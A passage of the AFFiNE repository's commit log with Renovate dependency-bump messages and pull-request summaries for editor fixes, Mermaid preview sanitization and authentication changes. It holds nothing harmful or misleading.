([cdaeb3b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cdaeb3bc7d8a80dfee13dd0de6dbc5a6f93f5c7c))
- **mybusinesslodging:** update the API
([34eda38](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/34eda38c76099f2aa6b906505fb7f2b33c43cf26))
- **mybusinessnotifications:** update the API
([ae38037](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ae38037c11139e45813fd0306e3357129b036e1d))
- **mybusinessplaceactions:** update the API
([c9f5ea0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c9f5ea0ebe9ee56b0c600367122f2f833fc82d33))
- **mybusinessqanda:** update the API
([9d43c1e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9d43c1e6ee4654d8bfff86aa44eee91c212e2aef))
- **mybusinessverifications:** update the API
([60bdbd2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/60bdbd229b5a25345953be1eff11813b10840902))
- **networksecurity:** update the API
([b4ab725](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b4ab7254926c2a80445481f490eb9738a7399f93))
- **networkservices:** update the API
([0cf9456](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0cf9456b33165b03510406f5173f875aa67b15c8))
- **notebooks:** update the API
([71b9980](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/71b99805f4a3b99585c09a1b5442e2e43be45d13))
- **oauth2:** update the API
([db72d5d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/db72d5d788e26b83dac6603dd0c66280e48643fe))
- **osconfig:** update the API
([fc51160](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fc5116090ac8e177af2cfe17ed5bb938d1f27470))
- **oslogin:** update the API
([d814cb9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d814cb920dcb533086161c1e8cba819aa36b7c6d))
- **pagespeedonline:** update the API
([ea4b6e3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ea4b6e327902369d129eab3b4433509d3e488c36))
- **people:** update the API
([d2f704e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d2f704e98cef30bc42636f7aa866bd0a2b586f20))
- **places:** update the API
([7dd5993](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7dd5993f4d5adbfd6eeed73bad1c066594fa8ffe))
- **playcustomapp:** update the API
([301c3ad](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/301c3adda469b043a7d0c632fb6b41f06c918a78))
- **playdeveloperreporting:** update the API
([7e73906](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7e7390622559837e06f16e7303d286eedf2a58ed))
- **playgrouping:** update the API
([9753005](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9753005a61f6aeaab0e433f2691b635508721923))
- **playintegrity:** update the API
([78dfca2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/78dfca25343031a78ba17ce5a9f84b4b449ff3c3))
- **policyanalyzer:** update the API
([703ab7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/703ab7bcbcd642386a483f5a70056a41b73f40ce))
- **policysimulator:** update the API
([4a7be29](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4a7be29e56b02985916e9a5e0563f4c447980134))
- **policytroubleshooter:** update the API
([a556194](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a556194c602dd8f577f043908a7647667c6ac3f4))
- **poly:** update the API
([12d5e41](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/12d5e413c9db34fc5c1c34ab4773499c5f8c9c3b))
- **prod\_tt\_sasportal:** update the API
([5dfac38](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5dfac38e84b1d21146a9fecd9ead4a04d81e19f8))
- **publicca:** update the API
([e7906c5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e7906c5b474e2303a50a91dd15b3c0ca37ffbff8))
- **pubsublite:** update the API
([f06ab43](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f06ab430e6095263623df08ac0ff727c9ec9c332))
- **rapidmigrationassessment:** update the API
([3fe4f53](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3fe4f53ee08c594ac96fbe126918d555910d962a))
- **readerrevenuesubscriptionlinking:** update the API
([c2996fa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c2996fac1a3f5c48fa0a0be9fa2b8b070f0e0a66))
- **realtimebidding:** update the API
([e05daef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e05daefcd22ec574a00043ba5dbc13e7097b9970))
- **recommendationengine:** update the API
([7b4553c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7b4553c671f92881f12ca6b0c6d13b9897cff259))
- **recommender:** update the API
([827d7fc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/827d7fcf0b01ee4bb097d0e9b258dacfd903d4de))
- **reseller:** update the API
([3b0d62c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3b0d62ce52be031269cc38d461464fde58015af4))
- **resourcesettings:** update the API
([b499612](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b49961200508406ed5dc860b66d671a1598026b0))
- **runtimeconfig:** update the API
([f4f60c4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f4f60c410d6d7a39d585a3f9711bd1e398cf1d42))
- **safebrowsing:** update the API
([ec3ca1a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec3ca1abec9b9a90efafba0840ad34bcaf28a24c))
- **sasportal:** update the API
([a6a96bc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a6a96bc8ee62e20c1dd078e8074b07ea523a58fd))
- **script:** update the API
([582352f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/582352f283013f76babffc3f34de45aff10fb44e))
- **searchconsole:** update the API
([25ad1ff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/25ad1ff213231bf47f909b48349a356b14d5dac6))
- **secretmanager:** update the API
([0d6d936](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0d6d93683ed834ad4414635c8408d1cbacda2c54))
- **servicedirectory:** update the API
([a550687](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a55068740ecafc29a193fe17a0d207e9becfdcac))
- **servicemanagement:** update the API
([74cb0a2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74cb0a2a62c6b29337808ad6fef57daf5c5afed5))
- **siteVerification:** update the API
([a0d8969](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a0d896969a6635f013a428cc58519075e58f7cfc))
- **slides:** update the API
([3e4be4b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3e4be4b9af47252b6b59de71255b08b2643f63df))
- **smartdevicemanagement:** update the API
([6ec4bd9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6ec4bd90d316f93cd12000ae76feb395c327100e))
- **solar:** update the API
([4377037](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4377037197348f7908f9c0a5937d2acd938ba2e5))
- **sourcerepo:** update the API
([0889507](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/088950701aeffc7aa8e6f2f17f955023e05494e1))
- **speech:** update the API
([504c8d0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/504c8d07f3a9363908cdee44b31294d97087956d))
- **storagetransfer:** update the API
([aee9c44](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/aee9c449cf7b6592a91674d8acf83c3f24089b87))
- **storage:** update the API
([cd03772](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cd037720cda614720bef7852812b1eb99d86d25f))
- **streetviewpublish:** update the API
([3a0401c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3a0401c216fd3c4bc8c11913572cf4f628df4813))
- **sts:** update the API
([bce176a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bce176a17c9e5ff821d2e6a058720f9f744e18b4))
- **tagmanager:** update the API
([594c354](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/594c354031bb89976ac2b46054c2e0cf6bcd3ed0))
- **tasks:** update the API
([4203139](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4203139d06bd3b8487d1d0e2d29b92ba7d9a6975))
- **testing:** update the API
([5d373cc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5d373cc08c089156b7ca26d52fd51c059e5c1227))
- **texttospeech:** update the API
([366a3fc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/366a3fc5e1e88c28e0500dbd72970b52bfa442e0))
- **toolresults:** update the API
([ad28679](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ad28679c983fdc6df90a2cfa73175f7d6f41c741))
- **transcoder:** update the API
([1799ca0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1799ca0e2b6c03a21e2dfecfcdd20efaf866222f))
- **translate:** update the API
([6ef599c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6ef599c831d7a797b797faf3736ac6514d6bf5c0))
- **travelimpactmodel:** update the API
([be498cd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/be498cde964258f31edd0d32e5032555b4bf0211))
- **vault:** update the API
([cb9bc44](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cb9bc4432053217aa68d18b283d55a4ca553617f))
- **versionhistory:** update the API
([0e4d78e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e4d78e3b4fdd766a38662bd270453080efd804d))
- **videointelligence:** update the API
([8139c6a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8139c6a6a353c42b878ba2c5751071ecaa06eff0))
- **vision:** update the API
([c6585c7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c6585c79b039060193405d68e865552f579dae19))
- **vmmigration:** update the API
([2664ee2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2664ee2f9c1f01d51d8545f4cab82535fac59846))
- **vmwareengine:** update the API
([fcdd0d9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fcdd0d9cc42e7e7b34ec2b431f94043cde95b8e3))
- **vpcaccess:** update the API
([fe1b7f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fe1b7f52025c36cd63df1b874d1303ab8e13abab))
- **walletobjects:** update the API
([58fe19c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/58fe19cf6606af287f80afa88f6846a0df9a23c6))
- **webfonts:** update the API
([bd5115d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bd5115dbc9c1bdb337f078cfac36bbc5143e41de))
- **webrisk:** update the API
([e227c8e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e227c8ed85845dfaf4aa51b0dd727d53a1a5f9cc))
- **websecurityscanner:** update the API
([3e1d63b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3e1d63b7ab93ca294ec0c983851321bc2fb85338))
- **workflowexecutions:** update the API
([3329041](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3329041d025edb6a14756e9f15324f6265e7a1e2))
- **workflows:** update the API
([b75aa48](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b75aa48a774260202f951f0b0b45255c8b346d69))
- **workspaceevents:** update the API
([78acf6b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/78acf6bdcb0197c34bc4f7950ed4bf351d386b59))
- **youtubeAnalytics:** update the API
([5fdf519](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5fdf519aebe3d4dfaa7fd477d1121dbc9bd1280f))
- **youtubereporting:** update the API
([87c5dcc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/87c5dcc04c98a5defa4a271125cd5a248eca800a))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDYuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIwNi4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-03 16:41:39 +08:00
renovate[bot] f98688f6c7 chore: bump up oxlint to v1.68.0 (#15071)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [oxlint](https://oxc.rs/docs/guide/usage/linter)
([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint))
| [`1.67.0` →
`1.68.0`](https://renovatebot.com/diffs/npm/oxlint/1.67.0/1.68.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/oxlint/1.68.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/oxlint/1.67.0/1.68.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/oxc (oxlint)</summary>

###
[`v1.68.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1680---2026-06-01)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.67.0...oxlint_v1.68.0)

##### 🚀 Features

-
[`e4b1f46`](https://redirect.github.com/oxc-project/oxc/commit/e4b1f46)
linter/typescript: Implement `method-signature-style` rule
([#&#8203;22679](https://redirect.github.com/oxc-project/oxc/issues/22679))
(Mikhail Baev)
-
[`bc462ca`](https://redirect.github.com/oxc-project/oxc/commit/bc462ca)
linter/vue: Implement no-reserved-component-names rule
([#&#8203;22741](https://redirect.github.com/oxc-project/oxc/issues/22741))
(bab)
-
[`ef9e751`](https://redirect.github.com/oxc-project/oxc/commit/ef9e751)
linter/vue: Implement component-definition-name-casing rule
([#&#8203;22818](https://redirect.github.com/oxc-project/oxc/issues/22818))
(bab)
-
[`d67f51a`](https://redirect.github.com/oxc-project/oxc/commit/d67f51a)
linter/vue: Implement require-prop-type-constructor rule
([#&#8203;22708](https://redirect.github.com/oxc-project/oxc/issues/22708))
(bab)
-
[`8422e8b`](https://redirect.github.com/oxc-project/oxc/commit/8422e8b)
linter/jsdoc: Implement `require-yields-description` rule
([#&#8203;22805](https://redirect.github.com/oxc-project/oxc/issues/22805))
(Mikhail Baev)
-
[`fe93f97`](https://redirect.github.com/oxc-project/oxc/commit/fe93f97)
linter/eslint: Implement `prefer-named-capture-group` rule
([#&#8203;22759](https://redirect.github.com/oxc-project/oxc/issues/22759))
(Sebastian Poxhofer)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-03 16:21:02 +08:00
Ahsan Khaleeq 37ffef76a4 fix(core): restore Mermaid preview labels and theme-aware contrast (#15073)
fix #14979 
[Bug]: mermaid transparent text in light theme

## Summary

Mermaid diagram preview in code blocks showed shapes and connectors but
no node or edge labels, with poor contrast in dark mode. This change
fixes rendering, sanitization, and display so labels are visible in both
light and dark themes.

## Root cause

1. **Mermaid 11 config** — `flowchart.htmlLabels: false` is ignored;
only root-level `htmlLabels` applies. Labels were still emitted in
`<foreignObject>`.
2. **SVG sanitization** — `sanitizeSvg()` removed all `foreignObject`
elements (and did not allow `<use>`), stripping most label content.
3. **Theme mismatch** — Preview always used Mermaid’s light `default`
theme while the preview panel follows AFFiNE light/dark, causing dark
text on dark backgrounds for edge and title text.
4. **Embedded CSS** — Mermaid’s inline SVG styles often do not apply
after sanitization, leaving text without a visible `fill`.

## Changes

### Classic renderer (`classic-mermaid.ts`)

- Set root-level `htmlLabels: false` (Mermaid 11+).
- Map `dark` theme to Mermaid’s built-in `dark` palette.

### Sanitization (`bridge.ts`)

- Allow `<use>` and `xlink:href` / `href` for label references.
- Allow `class`, `style`, and `id` on SVG nodes.
- **Sanitize** `foreignObject` inner HTML with DOMPurify instead of
deleting it.

### Preview UI (`mermaid-preview.ts`)

- Sync render theme with app `data-theme` (`default` / `dark`) and
re-render on theme change.
- Add CSS overrides so `text` / `tspan` and HTML inside `foreignObject`
use AFFiNE `text/primary`.

### Native / mobile (`preview.rs`)

- Map `dark` and `modern` themes to the modern renderer options (light
uses `default`).

### Types & tests

- Extend `MermaidRenderTheme` with `'dark'`.
- Update unit tests for sanitization and classic config.
- Add integration test (skips when the test environment cannot lay out
Mermaid).

## Test plan

- [ ] Hard refresh or restart `yarn dev`.
- [ ] Create a `mermaid` code block: `graph TD; A-->B` → enable
**Preview**.
- [ ] Confirm labels **A** and **B** appear inside nodes and on the
edge.
- [ ] Toggle AFFiNE **light** / **dark** theme; confirm preview updates
and text stays readable.
- [ ] Run unit tests:
  ```bash
yarn vitest run
packages/frontend/core/src/modules/code-block-preview-renderer/
  ```
- [ ] (Optional) With **Enable Native Mermaid Renderer** enabled in
experimental settings, repeat the manual check.

## Notes for reviewers

- Security: `foreignObject` content is sanitized with the HTML profile;
scripts are stripped.
- The integration test intentionally skips when Mermaid produces an
empty diagram (e.g. happy-dom without full browser layout).


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Mermaid diagrams now adapt to the app's dark or light theme and update
in real time.

* **Improvements**
* SVG sanitization now preserves diagram labels and foreignObject text
while removing unsafe content.
* Classic Mermaid rendering adjusted to keep text labels intact for
previews.

* **Tests**
* Added unit and integration tests covering Mermaid rendering and SVG
sanitization.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-03 16:20:34 +08:00
DarkSky 81760fd45c chore: cleanup legacy logic (#15072) 2026-06-03 16:20:15 +08:00
renovate[bot] 8c0e1ba04e chore: bump up linter to v1.68.0 (#15069)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint)
| [`1.67.0` →
`1.68.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.67.0/1.68.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/eslint-plugin-oxlint/1.68.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/eslint-plugin-oxlint/1.67.0/1.68.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/eslint-plugin-oxlint
(eslint-plugin-oxlint)</summary>

###
[`v1.68.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.68.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.67.0...v1.68.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.67.0...v1.68.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDYuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-03 02:40:13 +08:00
DarkSky aca47445aa feat(client): migration old package to rspack (#15068)
#### PR Dependency Tree


* **PR #15068** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Upgraded Vitest across packages to 4.1.8 and bumped Tailwind PostCSS
to 4.3.0
* CLI/tooling updated to support the media-capture-playground package
and adjust build/dev server behavior

* **Bug Fixes**
  * Improved workspace deletion reliability in the Electron app

* **Refactor**
* Simplified media capture playground build setup (build/config
adjustments)

* **Tests**
* Made tests more robust by preserving/restoring environment state
during runs
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-02 12:00:50 +08:00
Jessy Latmi 69c2f09eba fix(editor): keyboard shortcuts in table cells (#15067)
## Description
Fixes keyboard shortcuts for text formatting (Ctrl+B, Ctrl+I, Ctrl+U,
etc.) not working inside table cells.
## Changes
- **Modified `table-cell.ts`**: Updated the `_handleKeyDown` method to
only prevent default behavior for Tab key and allow other keyboard
events to propagate, enabling text formatting shortcuts to work properly
- **Created `table-keymap.ts`**: New module that registers the
`textKeymap` for table blocks, ensuring text formatting shortcuts are
available in table cells
- **Updated `view.ts`**: Registered the `TableKeymapExtension` in the
table view extension setup
- **Cleaned up `format.ts`**: Removed unnecessary `TextSelection` check
that was preventing shortcuts from working in table contexts
## Closes
Closes #13916 #12127

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved Tab key handling within table cells for more consistent
keyboard navigation.
* Simplified read-only detection for keyboard shortcuts to avoid
unexpected behavior.

* **Refactor**
* Reworked table keyboard mapping and registration to streamline
shortcut handling and event flow.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-02 10:52:05 +08:00
Ahsan Khaleeq 75f4c0eede feat(editor): add block button for hovering blocks (#14879)
This PR implements [feature request] #14845 

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Add-block control that appears when hovering blocks in page mode to
insert and auto-focus a new paragraph; control hides after insertion.

* **Improvements**
* Improved hover and interaction handling to avoid accidental triggers
when interacting with the drag handle or add-block control.
* Consistent sizing, positioning, and visibility behavior for the
add-block control.

* **Style**
  * Moved heading icon slightly for improved visual alignment.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-06-02 01:16:17 +08:00
DarkSky 38110de134 fix(core): desktop e2e (#15062)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Sign-in flows now reliably propagate richer authentication results
(user data and session type), improving persistence and reducing
intermittent sign-in issues.
* Native token handling gains a fallback for environments without
encrypted storage, improving session reliability.

* **New Features**
* User-visible warning when sign-in is session-only because encrypted
storage is unavailable.

* **Chores**
  * Tooling ignore patterns updated to exclude .codex.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-01 23:54:41 +08:00
DarkSky 7123595831 chore: bump deps (#15059)
#### PR Dependency Tree


* **PR #15059** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Configurable minimum account age before new accounts can invite
members or create share links (default: 24 hours).
* Sign-in now returns and caches user info for improved session
handling.

* **Bug Fixes**
  * Queue handling accepts and resolves job IDs with special characters.
* Improved clipboard/rich-text caret handling and nested-list paste
reliability.
  * Calendar tests use dynamic current-month dates.
  * AI search returns explicit "No matching documents" when none found.
  * Auth session responses are explicitly non-cacheable.

* **Chores**
* Dependency and toolchain bumps; admin UI config/schema exposes the new
account-age setting.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-01 20:13:59 +08:00
Marsssssssssssdsss 78cf402141 fix: handle empty results in MCP keyword_search tool (#15058)
## Description

Fixes: #15038 — MCP keyword_search tool errors with "Unexpected response
type" when no results are found.

### Problem

When the MCP `keyword_search` tool returns no matching documents, the
access control `.docs()` method may return `undefined`/`null` for an
empty input array. Calling `.map()` on this value throws an error, and
the MCP framework wraps it as "Unexpected response type".

### Solution

Added a guard check after the permission filtering step. If the result
is empty or null, the tool now returns a proper informational response
instead of throwing.

### Changes

- `packages/backend/server/src/plugins/copilot/mcp/provider.ts`: Added
null/empty check before `docs.map()` in the keyword_search tool execute
function.

### Testing

- **Before**: `keyword_search` with a non-existent keyword throws
"Unexpected response type"
- **After**: `keyword_search` with a non-existent keyword returns `{
content: [{ type: 'text', text: 'No matching documents found.' }] }`


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Prevented errors when document data is missing, improving search
stability.
* Improved search feedback by displaying a clear "No matching documents
found." message instead of empty results.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-01 17:56:42 +08:00
DarkSky ebd3e62ed9 fix(server): canary may missing changelog (#15061)
fix #15027 


#### PR Dependency Tree


* **PR #15061** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved handling of missing release notes during upgrade checks. The
changelog field now defaults to an empty value when release information
is unavailable.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-01 17:11:35 +08:00
DarkSky ce9841df9d feat(server): passkey pre-refactor (#15060)
#### PR Dependency Tree


* **PR #15060** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* OpenApp native sign-in and native session exchange (JWT) for mobile &
desktop.
  * Centralized short-lived auth challenge store for one-time tokens.
* Encrypted per-endpoint token storage and native token handlers
(Android, iOS, Electron).

* **Improvements**
* Richer auth-method reporting (password, magic link, OAuth, passkey)
and improved sign-in flows.
* Hardened magic-link, OAuth, and session issuance; JWT-backed sessions
and websocket JWT support.
* UX tweaks: form-based password submit, OTP autocomplete, adjusted
captcha flow.

* **Bug Fixes**
  * Expanded tests and auth-state resets to avoid cross-test leakage.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-01 17:11:15 +08:00
renovate[bot] 5b9d51b41b chore: bump up RevenueCat/purchases-ios-spm version to from: "5.75.0" (#15048)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm)
| minor | `from: "5.74.0"` → `from: "5.75.0"` |

---

### Release Notes

<details>
<summary>RevenueCat/purchases-ios-spm
(RevenueCat/purchases-ios-spm)</summary>

###
[`v5.75.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.74.0...5.75.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.74.0...5.75.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDIuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIwMi4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-31 04:07:47 +08:00
renovate[bot] 18471ef9b2 chore: bump up oxlint version to v1.67.0 (#15047)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [oxlint](https://oxc.rs/docs/guide/usage/linter)
([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint))
| [`1.66.0` →
`1.67.0`](https://renovatebot.com/diffs/npm/oxlint/1.66.0/1.67.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/oxlint/1.67.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/oxlint/1.66.0/1.67.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/oxc (oxlint)</summary>

###
[`v1.67.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1670---2026-05-26)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.66.0...oxlint_v1.67.0)

